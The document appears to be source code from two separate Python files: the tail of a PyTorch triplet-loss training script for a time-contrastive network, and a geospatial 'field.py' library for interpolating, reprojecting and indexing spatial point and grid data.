validation_builder = builder(args.n_views, args.validation_directory, args.validation_directory_depth, IMAGE_SIZE, args, sample_size=50)
validation_set = [validation_builder.build_set() for i in range(3)]
validation_set = ConcatDataset(validation_set)
del validation_builder
def validate(tcn, use_cuda, args):
# Run model on validation data and log results
data_loader = DataLoader(
validation_set,
batch_size=32,
shuffle=False,
pin_memory=use_cuda,
)
correct_with_margin = 0
correct_without_margin = 0
losses = []
for frames, features in data_loader:
# frames = Variable(minibatch, require_grad=False)
if use_cuda:
frames = frames.cuda()
features = features.cuda()
anchor_frames = frames[:, 0, :, :, :]
positive_frames = frames[:, 1, :, :, :]
negative_frames = frames[:, 2, :, :, :]
anchor_features = features[:, 0, :, :, :]
positive_features = features[:, 1, :, :, :]
anchor_frames = frames[:, 0, :, :, :]
positive_frames = frames[:, 1, :, :, :]
negative_frames = frames[:, 2, :, :, :]
anchor_features = features[:, 0, :, :, :]
positive_features = features[:, 1, :, :, :]
negative_features = features[:, 2, :, :, :]
anchor_output, unnormalized, _ = tcn(anchor_frames, anchor_features)
positive_output, _, _ = tcn(positive_frames, positive_features)
negative_output, _, _ = tcn(negative_frames, negative_features)
d_positive = distance(anchor_output, positive_output)
d_negative = distance(anchor_output, negative_output)
assert(d_positive.size()[0] == frames.size()[0])
correct_with_margin += ((d_positive + args.margin) < d_negative).data.cpu().numpy().sum()
correct_without_margin += (d_positive < d_negative).data.cpu().numpy().sum()
loss_triplet = torch.clamp(args.margin + d_positive - d_negative, min=0.0).mean()
loss = loss_triplet
losses.append(loss.data.cpu().numpy())
loss = np.mean(losses)
logger.info('val loss: ',loss)
message = "Validation score correct with margin {with_margin}/{total} and without margin {without_margin}/{total}".format(
with_margin=correct_with_margin,
without_margin=correct_without_margin,
total=len(validation_set)
)
logger.info(message)
return correct_with_margin, correct_without_margin, loss
def model_filename(model_name, epoch):
return "{model_name}-epoch-{epoch}.pk".format(model_name=model_name, epoch=epoch)
def save_model(model, filename, model_folder):
ensure_folder(model_folder)
model_path = os.path.join(model_folder, filename)
torch.save(model.state_dict(), model_path)
def build_set(queue, triplet_builder, log):
while 1:
datasets = []
for i in range(6):
dataset = triplet_builder.build_set()
datasets.append(dataset)
dataset = ConcatDataset(datasets)
# log.info('Created {0} triplets'.format(len(dataset)))
queue.put(dataset)
def create_model(use_cuda):
tcn = define_model_ltcn_depth()
# tcn = PosNet()
if args.load_model:
model_path = os.path.join(
args.model_folder,
args.load_model
)
# map_location allows us to load models trained on cuda to cpu.
tcn.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
if use_cuda:
tcn = tcn.cuda()
return tcn
def main():
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
use_cuda = torch.cuda.is_available()
tcn = create_model(use_cuda)
tcn = torch.nn.DataParallel(tcn, device_ids=range(torch.cuda.device_count()))
triplet_builder = builder(args.n_views, \
args.train_directory, args.train_directory_depth, IMAGE_SIZE, args, sample_size=50)
queue = multiprocessing.Queue(1)
dataset_builder_process = multiprocessing.Process(target=build_set, args=(queue, triplet_builder, logger), daemon=True)
dataset_builder_process.start()
optimizer = optim.SGD(tcn.parameters(), lr=args.lr_start, momentum=0.9)
# This will diminish the learning rate at the milestones.
# 0.1, 0.01, 0.001
learning_rate_scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[30, 50, 100], gamma=0.5)
criterion = nn.CrossEntropyLoss()
trn_losses_ = []
val_losses_= []
val_acc_margin_ = []
val_acc_no_margin_ = []
for epoch in range(args.start_epoch, args.start_epoch + args.epochs):
print("=" * 20)
logger.info("Starting epoch: {0} learning rate: {1}".format(epoch,
learning_rate_scheduler.get_lr()))
learning_rate_scheduler.step()
dataset = queue.get()
data_loader = DataLoader(
dataset=dataset,
batch_size=args.minibatch_size, # batch_size(epoch, args.max_minibatch_size),
shuffle=True,
pin_memory=use_cuda,
)
for _ in range(0, ITERATE_OVER_TRIPLETS):
losses = []
for frames, features in data_loader:
# frames = Variable(minibatch)
if use_cuda:
frames = frames.cuda()
features = features.cuda()
anchor_frames = frames[:, 0, :, :, :]
positive_frames = frames[:, 1, :, :, :]
negative_frames = frames[:, 2, :, :, :]
anchor_features = features[:, 0, :, :, :]
positive_features = features[:, 1, :, :, :]
negative_features = features[:, 2, :, :, :]
anchor_output, unnormalized, _ = tcn(anchor_frames, anchor_features)
positive_output, _, _ = tcn(positive_frames, positive_features)
negative_output, _, _ = tcn(negative_frames, negative_features)
d_positive = distance(anchor_output, positive_output)
d_negative = distance(anchor_output, negative_output)
loss_triplet = torch.clamp(args.margin + d_positive - d_negative, min=0.0).mean()
loss = loss_triplet
losses.append(loss.data.cpu().numpy())
optimizer.zero_grad()
loss.backward()
optimizer.step()
trn_losses_.append(np.mean(losses))
logger.info('train loss: ', np.mean(losses))
if epoch % 1 == 0:
acc_margin, acc_no_margin, loss = validate(tcn, use_cuda, args)
val_losses_.append(loss)
val_acc_margin_.append(acc_margin)
val_acc_no_margin_.append(acc_no_margin)
if epoch % args.save_every == 0 and epoch != 0:
logger.info('Saving model.')
save_model(tcn, model_filename(args.model_name, epoch), args.model_folder)
plot_mean(trn_losses_, args.model_folder, 'train_loss')
plot_mean(val_losses_, args.model_folder, 'validation_loss')
# plot_mean(train_acc_, args.model_folder, 'train_acc')
plot_mean(val_acc_margin_, args.model_folder, 'validation_accuracy_margin')
plot_mean(val_acc_no_margin_, args.model_folder, 'validation_accuracy_no_margin')
if __name__ == '__main__':
main()
|
field.py
|
from __future__ import division
from __future__ import print_function
# still tracking down the last few calls missing the np. prefix,
# leftover from 'from numpy import *'
import numpy as np
import glob,types
import copy
from numpy.random import random
from numpy import ma
from numpy.linalg import norm
import tempfile
from scipy import interpolate
try:
from scipy.stats import nanmean
except ImportError:
from numpy import nanmean
from scipy import signal
from scipy import ndimage
from scipy.interpolate import RectBivariateSpline
from functools import wraps
# Lazily loads plt just for plotting functions.
# Gross, but helpful??
def with_plt(f):
@wraps(f)
def wrapper(*args, **kwds):
global plt
import matplotlib.pyplot as plt
return f(*args, **kwds)
return wrapper
try:
import matplotlib.tri as delaunay
except ImportError:
# older deprecated module
from matplotlib import delaunay
from . import wkb2shp
from ..utils import array_append, isnat, circumcenter, dist, set_keywords
try:
from matplotlib import cm
except ImportError:
cm = None
# load both types of indices, so we can choose per-field
# which one to use
from .gen_spatial_index import PointIndex,RectIndex
# Older code tried to use multiple implementations
# import stree
# from safe_rtree import Rtree
# from rtree.index import Rtree
xxyy = np.array([0,0,1,1])
xyxy = np.array([0,1,0,1])
def as_xxyy(p1p2):
p1p2=np.asarray(p1p2)
if p1p2.ndim == 1:
return p1p2 # presumably it's already xxyy layout
else:
return np.array(p1p2[xyxy,xxyy])
from .linestring_utils import upsample_linearring
try:
import cPickle as pickle
except ImportError:
import pickle
import subprocess,threading
import logging
log=logging.getLogger(__name__)
try:
from osgeo import gdal,osr,ogr
except ImportError:
try:
import gdal,osr,ogr
except ImportError:
gdal=osr=ogr=None
log.warning("GDAL not loaded")
try:
from shapely import geometry, wkb
try:
from shapely.prepared import prep
except ImportError:
prep = none
except ImportError:
log.warning("Shapely not loaded")
wkb=geometry=None
import os.path
if gdal:
numpy_type_to_gdal = {np.int8:gdal.GDT_Byte, # meh. not quite real, most likely
np.uint8:gdal.GDT_Byte,
np.float32:gdal.GDT_Float32,
np.float64:gdal.GDT_Float64,
np.int16:gdal.GDT_Int16,
np.int32:gdal.GDT_Int32,
int:gdal.GDT_Int32,
np.uint16:gdal.GDT_UInt16,
np.uint32:gdal.GDT_UInt32}
# # try to create an easier way to handle non-uniform meshes. In particular
# # it would be nice to be able to something like:
#
# foo = field.gdal_source('foo.asc') # grid is lat/lon
#
# foo_utm = foo.transform_to('EPSG:26910')
#
# bar = field.xyz_source('bar.xyz') # point data
#
# # this uses the foo_utm grid, adds values interpolated from bar, and any
# # points where bar cannot interpolate are assigned nan.
# foo_bar = foo_utm.add(bar,keep='valid')
class Field(object):
""" Superclass for spatial fields
"""
def __init__(self,projection=None):
"""
projection: GDAL/OGR parseable string representation
"""
self.assign_projection(projection)
def assign_projection(self,projection):
self._projection = projection
def reproject(self,from_projection=None,to_projection=None):
""" Reproject to a new coordinate system.
If the input is structured, this will create a curvilinear
grid, otherwise it creates an XYZ field.
"""
xform = self.make_xform(from_projection,to_projection)
new_field = self.apply_xform(xform)
new_field._projection = to_projection
return new_field
def copy(self):
return copy.copy(self)
def make_xform(self,from_projection,to_projection):
if from_projection is None:
from_projection = self.projection()
if from_projection is None:
raise Exception("No source projection can be determined")
src_srs = osr.SpatialReference()
src_srs.SetFromUserInput(from_projection)
dest_srs = osr.SpatialReference()
dest_srs.SetFromUserInput(to_projection)
xform = osr.CoordinateTransformation(src_srs,dest_srs)
return xform
def xyz(self):
raise Exception("Not implemented")
def crop(self,rect):
raise Exception("Not implemented")
def projection(self):
return self._projection
def bounds(self):
raise Exception("Not Implemented")
def bounds_in_cs(self,cs):
b = self.bounds()
xform = self.make_xform(self.projection(),cs)
corners = [ [b[0],b[2]],
[b[0],b[3]],
[b[1],b[2]],
[b[1],b[3]] ]
new_corners = np.array( [xform.TransformPoint(c[0],c[1])[:2] for c in corners] )
xmin = new_corners[:,0].min()
xmax = new_corners[:,0].max()
ymin = new_corners[:,1].min()
ymax = new_corners[:,1].max()
return [xmin,xmax,ymin,ymax]
def quantize_space(self,quant):
self.X = round_(self.X)
def envelope(self,eps=1e-4):
""" Return a rectangular shapely geometry the is the bounding box of
this field.
"""
b = self.bounds()
return geometry.Polygon( [ [b[0]-eps,b[2]-eps],
[b[1]+eps,b[2]-eps],
[b[1]+eps,b[3]+eps],
[b[0]-eps,b[3]+eps],
[b[0]-eps,b[2]-eps] ])
## Some methods taken from density_field, which Field will soon supplant
def value(self,X):
""" in density_field this was called 'scale' - evaluates the field
at the given point or vector of points. Some subclasses can be configured
to interpolate in various ways, but by default should do something reasonable
"""
raise Exception("not implemented")
# X = np.array(X)
# return self.constant * np.ones(X.shape[:-1])
def value_on_edge(self,e,samples=5,reducer=np.nanmean):
""" Return the value averaged along an edge - the generic implementation
just takes 5 samples evenly spaced along the line, using value()
"""
x=np.linspace(e[0,0],e[1,0],samples)
y=np.linspace(e[0,1],e[1,1],samples)
X = np.array([x,y]).transpose()
return reducer(self.value(X))
def __call__(self,X):
return self.value(X)
def __mul__(self,other):
return BinopField(self,np.multiply,other)
def __rmul__(self,other):
return BinopField(other,np.multiply,self)
def __add__(self,other):
return BinopField(self,np.add,other)
def __sub__(self,other):
return BinopField(self,np.subtract,other)
def to_grid(self,nx=None,ny=None,interp='linear',bounds=None,dx=None,dy=None,valuator='value'):
""" bounds is a 2x2 [[minx,miny],[maxx,maxy]] array, and is *required* for BlenderFields
bounds can also be a 4-element sequence, [xmin,xmax,ymin,ymax], for compatibility with
matplotlib axis(), and Paving.default_clip.
specify *one* of:
nx,ny: specify number of samples in each dimension
dx,dy: specify resolution in each dimension
interp used to default to nn, but that is no longer available in mpl, so now use linear.
bounds is interpreted as the range of center locations of pixels. This gets a bit
gross, but that is how some of the tile functions below work.
"""
if bounds is None:
xmin,xmax,ymin,ymax = self.bounds()
else:
if len(bounds) == 2:
xmin,ymin = bounds[0]
xmax,ymax = bounds[1]
else:
xmin,xmax,ymin,ymax = bounds
if nx is None:
nx=1+int(np.round((xmax-xmin)/dx))
ny=1+int(np.round((ymax-ymin)/dy))
x = np.linspace( xmin,xmax, nx )
y = np.linspace( ymin,ymax, ny )
xx,yy = np.meshgrid(x,y)
X = np.concatenate( (xx[...,None], yy[...,None]), axis=2)
if valuator=='value':
newF = self.value(X)
else:
valuator == getattr(self,valuator)
newF = valuator(X)
return SimpleGrid(extents=[xmin,xmax,ymin,ymax],
F=newF,projection=self.projection())
# Different internal representations:
# SimpleGrid - constant dx, dy, data just stored in array.
class XYZField(Field):
def __init__(self,X,F,projection=None,from_file=None):
""" X: Nx2 array of x,y locations
F: N array of values
"""
Field.__init__(self,projection=projection)
self.X = X
self.F = F
self.index = None
self.from_file = from_file
self.init_listeners()
@with_plt
def plot(self,**kwargs):
# this is going to be slow...
def_args = {'c':self.F,
'antialiased':False,
'marker':'s',
'lw':0}
def_args.update(kwargs)
plt.scatter( self.X[:,0].ravel(),
self.X[:,1].ravel(),
**def_args)
def bounds(self):
if self.X.shape[0] == 0:
return None
xmin = self.X[:,0].min()
xmax = self.X[:,0].max()
ymin = self.X[:,1].min()
ymax = self.X[:,1].max()
return (xmin,xmax,ymin,ymax)
def apply_xform(self,xform):
new_fld=self.copy()
new_X = self.X.copy()
if len(self.F)>10000:
print("Transforming points")
for i in range(len(self.F)):
if i>0 and i % 10000 == 0:
print("%.2f%%"%( (100.0*i) / len(self.F)) )
new_X[i] = xform.TransformPoint(*self.X[i])[:2]
if len(self.F)>10000:
print("Done transforming points")
# projection should get overwritten by the caller
new_fld.X=new_X
return new_fld
# an XYZ Field of our voronoi points
_tri = None
def tri(self,aspect=1.0):
if aspect!=1.0:
return delaunay.Triangulation(self.X[:,0],
aspect*self.X[:,1])
if self._tri is None:
self._tri = delaunay.Triangulation(self.X[:,0],
self.X[:,1])
return self._tri
def plot_tri(self,**kwargs):
import plot_utils
plot_utils.plot_tri(self.tri(),**kwargs)
_nn_interper = None
def nn_interper(self,aspect=1.0):
if aspect!=1.0:
try:
return self.tri(aspect=aspect).nn_interpolator(self.F)
except AttributeError:
raise Exception("Request for nearest-neighbors, which was discontinued by mpl")
if self._nn_interper is None:
try:
self._nn_interper = self.tri().nn_interpolator(self.F)
except AttributeError:
raise Exception("Request for nearest-neighbors, which was discontinued by mpl")
return self._nn_interper
_lin_interper = None
def lin_interper(self,aspect=1.0):
def get_lin_interp(t,z):
try:
return t.linear_interpolator(z)
except AttributeError: # modern matplotlib separates this out:
from matplotlib.tri import LinearTriInterpolator
return LinearTriInterpolator(t,z)
if aspect!=1.0:
return get_lin_interp(self.tri(aspect=aspect),self.F)
if self._lin_interper is None:
self._lin_interper = get_lin_interp(self.tri(),self.F)
return self._lin_interper
#_voronoi = None
# default_interpolation='naturalneighbor'# phased out by mpl
default_interpolation='linear'
# If true, linear interpolation will revert to nearest when queried outside
# the convex hull
outside_hull_fallback=True
def interpolate(self,X,interpolation=None):
"""
X: [...,2] coordinates at which to interpolate.
interpolation: should have been called 'method'.
The type of interpolation.
'nearest': select nearest source point
'naturalneighbor': Deprecated (only works with very old MPL)
Delaunay triangulation-based natural neighbor interpolation.
'linear': Delaunay-based linear interpolation.
"""
if interpolation is None:
interpolation=self.default_interpolation
# X should be a (N,2) vectors - make it so
X=np.asanyarray(X).reshape([-1,2])
newF = np.zeros( X.shape[0], np.float64 )
if interpolation=='nearest':
for i in range(len(X)):
if i % 10000 == 1:
print( " %.2f%%"%( (100.0*i)/len(X) ))
if not self.index:
dsqr = ((self.X - X[i])**2).sum(axis=1)
j = np.argmin( dsqr )
else:
j = self.nearest(X[i])
newF[i] = self.F[j]
elif interpolation=='naturalneighbor':
newF = self.nn_interper()(X[:,0],X[:,1])
# print "why aren't you using linear?!"
elif interpolation=='linear':
interper = self.lin_interper()
newF[:] = interper(X[:,0],X[:,1])
if self.outside_hull_fallback:
# lin_interper may return masked array instead
# of nans.
newF=np.ma.filled(newF,np.nan)
bad=np.isnan(newF)
if np.any(bad):
# Old approach, use nearest:
newF[bad]=self.interpolate(X[bad],'nearest')
else:
raise Exception("Bad value for interpolation method %s"%interpolation)
return newF
def build_index(self,index_type=None):
if index_type is not None:
log.warning("Ignoring request for specific index type")
self.index_type = 'rtree'
if self.X.shape[0] > 0:
# this way we get some feedback
def gimme():
i = gimme.i
if i < self.X.shape[0]:
if i %10000 == 0 and i>0:
print("building index: %d - %.2f%%"%(i, 100.0 * i / self.X.shape[0] ))
gimme.i = i+1
return (i,self.X[i,xxyy],None)
else:
return None
gimme.i = 0
tuples = iter(gimme,None)
#print "just building Rtree index in memory"
self.index = PointIndex(tuples,interleaved=False)
else:
self.index = PointIndex(interleaved=False)
#print "Done"
def within_r(self,p,r):
if self.index:
if self.index_type == 'stree':
subset = self.index.within_ri(p,r)
else: # rtree
# first query a rectangle
rect = np.array( [p[0]-r,p[0]+r,p[1]-r,p[1]+r] )
subset = self.index.intersection( rect )
if isinstance(subset, types.GeneratorType):
subset = list(subset)
subset = np.array( subset )
if len(subset) > 0:
dsqr = ((self.X[subset]-p)**2).sum(axis=1)
subset = subset[ dsqr<=r**2 ]
return subset
else:
# print "bad - no index"
dsqr = ((self.X-p)**2).sum(axis=1)
return where(dsqr<=r**2)[0]
def inv_dist_interp(self,p,
min_radius=None,min_n_closest=None,
clip_min=-np.inf,clip_max=np.inf,
default=None):
""" inverse-distance weighted interpolation
This is a bit funky because it tries to be smart about interpolation
both in dense and sparse areas.
min_radius: sample from at least this radius around p
min_n_closest: sample from at least this many points
"""
if min_radius is None and min_n_closest is None:
raise Exception("Must specify one of r (radius) or n_closest")
r = min_radius
if r:
nearby = self.within_r(p,r)
# have we satisfied the criteria? if a radius was specified
if min_n_closest is not None and len(nearby) < min_n_closest:
# fall back to nearest
nearby = self.nearest(p,min_n_closest)
else:
# this is slow when we have no starting radius
nearby = self.nearest(p,min_n_closest)
dists = np.sqrt( ((p-self.X[nearby])**2).sum(axis=1) )
# may have to trim back some of the extras:
if r is not None and r > min_radius:
good = np.argsort(dists)[:min_n_closest]
nearby = nearby[good]
dists = dists[good]
if min_radius is None:
# hrrmph. arbitrary...
min_radius = dists.mean()
dists[ dists < 0.01*min_radius ] = 0.01*min_radius
weights = 1.0/dists
vals = self.F[nearby]
vals = np.clip(vals,clip_min,clip_max)
val = (vals * weights).sum() / weights.sum()
return val
def nearest(self,p,count=1):
# print " Field::nearest(p=%s,count=%d)"%(p,count)
if self.index:
if self.index_type=='stree':
if count == 1:
return self.index.closest(p)
else:
return self.index.n_closest(p,count)
else: # rtree
hits = self.index.nearest( p[xxyy], count )
# deal with API change in RTree
if isinstance( hits, types.GeneratorType):
hits = [next(hits) for i in range(count)]
if count == 1:
return hits[0]
else:
return np.array(hits)
else:
# straight up, it takes 50ms per query for a small
# number of points
dsqr = ((self.X - p)**2).sum(axis=1)
if count == 1:
j = np.argmin( dsqr )
return j
else:
js = np.argsort( dsqr )
return js[:count]
def rectify(self,dx=None,dy=None):
""" Convert XYZ back to SimpleGrid. Assumes that the data fall on a regular
grid. if dx and dy are None, automatically find the grid spacing/extents.
"""
max_dimension = 10000.
# Try to figure out a rectilinear grid that fits the data:
xmin,xmax,ymin,ymax = self.bounds()
# establish lower bound on delta x:
if dx is None:
min_deltax = (xmax - xmin) / max_dimension
xoffsets = self.X[:,0] - xmin
dx = xoffsets[xoffsets>min_deltax].min()
if dy is None:
min_deltay = (ymax - ymin) / max_dimension
yoffsets = self.X[:,1] - ymin
dy = yoffsets[yoffsets>min_deltay].min()
print("Found dx=%g dy=%g"%(dx,dy))
nrows = 1 + int( 0.49 + (ymax - ymin) / dy )
ncols = 1 + int( 0.49 + (xmax - xmin) / dx )
# recalculate dx to be accurate over the whole range:
dx = (xmax - xmin) / (ncols-1)
dy = (ymax - ymin) / (nrows-1)
delta = np.array([dx,dy])
newF = np.nan*np.ones( (nrows,ncols), np.float64 )
new_indices = (self.X - np.array([xmin,ymin])) / delta + 0.49
new_indices = new_indices.astype(np.int32)
new_indices = new_indices[:,::-1]
newF[new_indices[:,0],new_indices[:,1]] = self.F
return SimpleGrid(extents=[xmin,xmax,ymin,ymax],
F=newF,projection=self.projection())
def to_grid(self,nx=2000,ny=2000,interp='linear',bounds=None,dx=None,dy=None,
aspect=1.0,max_radius=None):
""" use the delaunay based griddata() to interpolate this field onto
a rectilinear grid. In theory interp='linear' would give bilinear
interpolation, but it tends to complain about grid spacing, so best to stick
with the default 'nn' which gives natural neighbor interpolation and is willing
to accept a wider variety of grids
Here we use a specialized implementation that passes the extent/stride array
to interper, since lin_interper requires this.
interp='qhull': use scipy's delaunay/qhull interface. this can
additionally accept a radius which limits the output to triangles
with a smaller circumradius.
"""
if bounds is None:
xmin,xmax,ymin,ymax = self.bounds()
else:
if len(bounds) == 4:
xmin,xmax,ymin,ymax = bounds
else:
xmin,ymin = bounds[0]
xmax,ymax = bounds[1]
if dx is not None: # Takes precedence of nx/ny
# This seems a bit heavy handed
# round xmin/ymin to be an even multiple of dx/dy
# xmin = xmin - (xmin%dx)
# ymin = ymin - (ymin%dy)
# The 1+, -1, stuff feels a bit sketch. But this is how
# CompositeField calculates sizes
nx = 1 + int( (xmax-xmin)/dx )
ny = 1 + int( (ymax-ymin)/dy )
xmax = xmin + (nx-1)*dx
ymax = ymin + (ny-1)*dy
# hopefully this is more compatible between versions, also exposes more of what's
# going on
if interp == 'nn':
interper = self.nn_interper(aspect=aspect)
elif interp=='linear':
interper = self.lin_interper(aspect=aspect)
elif interp=='qhull':
interper = self.qhull_interper(max_radius=max_radius)
try:
griddedF = interper[aspect*ymin:aspect*ymax:ny*1j,xmin:xmax:nx*1j]
except TypeError: # newer interpolation doesn't have [y,x] notation
y=np.linspace(aspect*ymin,aspect*ymax,ny)
x=np.linspace(xmin,xmax,nx)
# y,x led to the dimensions being swapped
X,Y=np.meshgrid(x,y)
# Y,X below led to all values being nan...
griddedF = interper(X,Y) # not sure about index ordering here...
return SimpleGrid(extents=[xmin,xmax,ymin,ymax],F=griddedF)
def qhull_interper(self,max_radius=None):
from scipy.spatial import Delaunay
from scipy.interpolate import LinearNDInterpolator
tri=Delaunay(self.X)
if max_radius is not None:
tris=tri.simplices
ccs=circumcenter( tri.points[tri.simplices[:,0]],
tri.points[tri.simplices[:,1]],
tri.points[tri.simplices[:,2]] )
rad=dist(ccs-tri.points[tri.simplices[:,0]])
bad=rad>max_radius
else:
bad=None
lin_nd=LinearNDInterpolator(tri,self.F)
def interper(X,Y,lin_nd=lin_nd,bad=bad,tri=tri):
XY=np.stack((X,Y),axis=-1)
XYr=XY.reshape([-1,2])
simps=tri.find_simplex(XYr)
result=lin_nd(XYr)
if bad is not None:
result[(simps<0)|(bad[simps])]=np.nan
return result.reshape(X.shape)
return interper
def crop(self,rect):
if len(rect)==2:
rect=[rect[0][0],rect[1][0],rect[0][1],rect[1][1]]
xmin,xmax,ymin,ymax = rect
good = (self.X[:,0] >= xmin ) & (self.X[:,0] <= xmax ) & (self.X[:,1] >= ymin) & (self.X[:,1]<=ymax)
newX = self.X[good,:]
newF = self.F[good]
return XYZField(newX,newF, projection = self.projection() )
def write_text(self,fname,sep=' '):
fp = file(fname,'wt')
for i in range(len(self.F)):
fp.write( "%f%s%f%s%f\n"%(self.X[i,0],sep,
self.X[i,1],sep,
self.F[i] ) )
fp.close()
def intersect(self,other,op,radius=0.1):
""" Create new pointset that has points that are in both fields, and combine
the values with the given operator op(a,b)
"""
my_points = []
new_F = []
if not self.index:
self.build_index()
for i in range(len(other.F)):
if i % 10000 == 0:
print("%.2f%%"%(100.0*i/len(other.F)))
p = self.within_r( other.X[i], radius )
if len(p) > 0:
# fudge it and take the first one...
my_points.append(p[0])
new_F.append( op(self.F[p[0]],other.F[i] ) )
my_points = np.array(my_points)
new_F = np.array(new_F)
new_X = self.X[ my_points ]
return XYZField( new_X, new_F )
def decimate(self,factor):
chooser = random( self.F.shape ) < 1.0/factor
return XYZField( self.X[chooser,:], self.F[chooser], projection = self.projection() )
def clip_to_polygon(self,poly):
if not self.index:
self.build_index()
if prep:
chooser = np.zeros(len(self.F),bool8)
prep_poly = prep(poly)
for i in range(len(self.F)):
chooser[i] = prep_poly.contains( geometry.Point(self.X[i]) )
else:
# this only works with the stree implementation.
chooser = self.index.inside_polygon(poly)
if len(chooser) == 0:
print("Clip to polygon got no points!")
print("Returning empty field")
return XYZField( np.zeros((0,2),np.float64), np.zeros( (0,1), np.float64) )
else:
return XYZField( self.X[chooser,:], self.F[chooser] )
def cs2cs(self,
src="+proj=utm +zone=10 +datum=NAD27 +nadgrids=conus",
dst="+proj=utm +zone=10 +datum=NAD83"):
""" In place modification of coordinate system. Defaults to UTM NAD27 -> UTM NAD83
"""
cmd = "cs2cs -f '%%f' %s +to %s"%(src,dst)
proc = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE)
pnts = []
def reader():
while 1:
line = proc.stdout.readline()
if line == '':
break
pnts.append(list(map(float,line.split()[:2])))
thr = threading.Thread(target = reader)
thr.start()
point_count = len(self.F)
for i in range(point_count):
if i % 10000 == 0:
print("%.2f%%"%( (100.0*i)/point_count ))
proc.stdin.write("%.2f %.2f\n"%(self.X[i,0], self.X[i,1]) )
proc.stdin.close()
print("Finished writing")
thr.join()
pnts = np.array(pnts)
if pnts.shape != self.X.shape:
raise Exception('Size of converted points is %s, not %s'%( pnts.shape, self.X.shape ) )
self.X = pnts
def write(self,fname):
fp = open(fname,'wb')
pickle.dump( (self.X,self.F), fp, -1)
fp.close()
def to_xyz(self):
# should this be self, or a copy of self???
return self
@staticmethod
def read_shp(shp_name,value_field='value'):
ods = ogr.Open(shp_name)
X = []
F = []
layer = ods.GetLayer(0)
while 1:
feat = layer.GetNextFeature()
if feat is None:
break
F.append( feat.GetField(value_field) )
geo = feat.GetGeometryRef()
X.append( geo.GetPoint_2D() )
X = np.array( X )
F = np.array( F )
return XYZField(X=X,F=F,from_file=shp_name)
def write_shp(self,shp_name,value_field='value'):
drv = ogr.GetDriverByName('ESRI Shapefile')
### open the output shapefile
if os.path.exists(shp_name) and shp_name.find('.shp')>=0:
print("removing ",shp_name)
os.unlink(shp_name)
ods = drv.CreateDataSource(shp_name)
srs = osr.SpatialReference()
if self.projection():
srs.SetFromUserInput(self.projection())
else:
srs.SetFromUserInput('EPSG:26910')
layer_name = os.path.splitext( os.path.basename(shp_name) )[0]
### Create the layer
olayer = ods.CreateLayer(layer_name,
srs=srs,
geom_type=ogr.wkbPoint)
olayer.CreateField(ogr.FieldDefn('id',ogr.OFTInteger))
olayer.CreateField(ogr.FieldDefn(value_field,ogr.OFTReal))
fdef = olayer.GetLayerDefn()
### Iterate over depth data
for i in range(len(self.X)):
x,y = self.X[i]
wkt = geometry.Point(x,y).wkt
new_feat_geom = ogr.CreateGeometryFromWkt( wkt )
feat = ogr.Feature(fdef)
feat.SetGeometryDirectly(new_feat_geom)
feat.SetField('id',i)
feat.SetField(value_field,self.F[i])
olayer.CreateFeature(feat)
olayer.SyncToDisk()
### Create spatial index:
ods.ExecuteSQL("create spatial index on %s"%layer_name)
@staticmethod
def read(fname):
"""
Read XYZField from a pickle file
"""
fp = open(fname,'rb')
X,F = pickle.load( fp )
fp.close()
return XYZField(X=X,F=F,from_file=fname)
@staticmethod
def merge(all_sources):
all_X = concatenate( [s.X for s in all_sources] )
all_F = concatenate( [s.F for s in all_sources] )
return XYZField(all_X,all_F,projection=all_sources[0].projection())
## Editing API for use with GUI editor
def move_point(self,i,pnt):
self.X[i] = pnt
if self.index:
if self.index_type == 'stree':
self.index = None
else:
old_coords = self.X[i,xxyy]
new_coords = pnt[xxyy]
self.index.delete(i, old_coords )
self.index.insert(i, new_coords )
self.updated_point(i)
def add_point(self,pnt,value):
""" Insert a new point into the field, clearing any invalidated data
and returning the index of the new point
"""
i = len(self.X)
self.X = array_append(self.X,pnt)
self.F = array_append(self.F,value)
self._tri = None
self._nn_interper = None
self._lin_interper = None
if self.index is not None:
if self.index_type == 'stree':
print("Stree doesn't know how to add points")
self.index = None
else:
print("Adding new point %d to index at "%i,self.X[i])
self.index.insert(i, self.X[i,xxyy] )
self.created_point(i)
return i
def delete_point(self,i):
if self.index is not None:
if self.index_type == 'stree':
print("Stree doesn't know how to delete point")
self.index = None
else:
coords = self.X[i,xxyy]
self.index.delete(i, coords )
self.X[i,0] = np.nan
self.F[i] = np.nan
self.deleted_point(i)
# subscriber interface for updates:
listener_count = 0
def init_listeners(self):
self._update_point_listeners = {}
self._create_point_listeners = {}
self._delete_point_listeners = {}
def listen(self,event,cb):
cb_id = self.listener_count
if event == 'update_point':
self._update_point_listeners[cb_id] = cb
elif event == 'create_point':
self._create_point_listeners[cb_id] = cb
elif event == 'delete_point':
self._delete_point_listeners[cb_id] = cb
else:
raise Exception("unknown event %s"%event)
self.listener_count += 1
return cb_id
def updated_point(self,i):
for cb in self._update_point_listeners.values():
cb(i)
def created_point(self,i):
for cb in self._create_point_listeners.values():
cb(i)
def deleted_point(self,i):
for cb in self._delete_point_listeners.values():
cb(i)
## Methods taken from XYZDensityField
def value(self,X):
""" X must be shaped (...,2)
"""
X = np.asanyarray(X)
orig_shape = X.shape
X = X.reshape((-1,2))
newF = self.interpolate(X)
newF = newF.reshape(orig_shape[:-1])
if newF.ndim == 0:
return float(newF)
else:
return newF
@with_plt
def plot_on_boundary(self,bdry):
# bdry is an array of vertices (presumbly on the boundary)
l = np.zeros( len(bdry), np.float64 )
ax = plt.gca()
for i in range(len(bdry)):
l[i] = self.value( bdry[i] )
cir = Circle( bdry[i], radius=l[i])
ax.add_patch(cir)
# Pickle support -
def __getstate__(self):
""" the CGAL.ApolloniusGraph can't be pickled - have to recreate it
"""
d = self.__dict__.copy()
d['_lin_interper']=None
return d
class PyApolloniusField(XYZField):
"""
Takes a set of vertices and the allowed scale at each, and
extrapolates across the plane based on a uniform telescoping rate
"""
# But it's okay if redundant factor is None
def __init__(self,X=None,F=None,r=1.1,redundant_factor=None):
"""r: telescoping rate
redundant_factor: if a point being inserted has a scale which
is larger than the redundant_factor times the existing scale
at its location, then don't insert it. So typically it would
be something like 0.95, which says that if the existing scale
at X is 100, and this point has a scale of 96, then we don't
insert.
"""
if X is None:
assert F is None
self.r = r
self.redundant_factor = redundant_factor
self.offset=np.array([0,0]) # not using an offset for now.
if (X is None) or (redundant_factor is not None):
super(PyApolloniusField,self).__init__(X=np.zeros( (0,2), np.float64),
